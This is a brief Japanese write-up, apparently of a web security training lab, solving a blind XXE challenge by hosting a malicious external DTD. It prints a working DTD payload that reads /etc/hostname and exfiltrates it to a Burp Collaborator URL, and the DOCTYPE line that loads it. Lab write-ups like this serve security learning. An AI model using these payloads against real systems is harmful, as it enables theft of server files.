Hello there, ('ω')ノ

 

ブラインドXXEを悪用して、悪意のある外部DTDを使用してデータを盗み出すを。

これまでリクエストに書き込んでいたDTDを外出しというわけで。

Check stockをクリックして。

 

 

XMLのリクエストをリピータへ。

その後、コラボレータを起動してペイロードをコピーして。

 

 

下記のDTDにコラボレータのURIを書き込んだ悪意のあるものを配置して。

パーセント記号のデフォルト値は「％」文字、コードだと#x25で。

 

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://vcb7rn0tctd26yn9knla3sg3quwlka.burpcollaborator.net/?x=%file;'>">
%eval;
%exfil;

 

最後にSaveして。

 

 

View exploitで確認して。

 

 

リクエストボディには、エクスプロイトサーバにあるDTDを読み込むようにして。

Sendして。

 

　<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://acb41fca1f533254807530d701ca00f7.web-security-academy.net/exploit"> %xxe;]>

 

 

HTTP interactionには、 DTDで指定した/etc/hostnameのファイルが。

 

 

下記を入力すると。

　27a91fa11675

 

 

クリアできた。

 

 

Best regards, (^^ゞ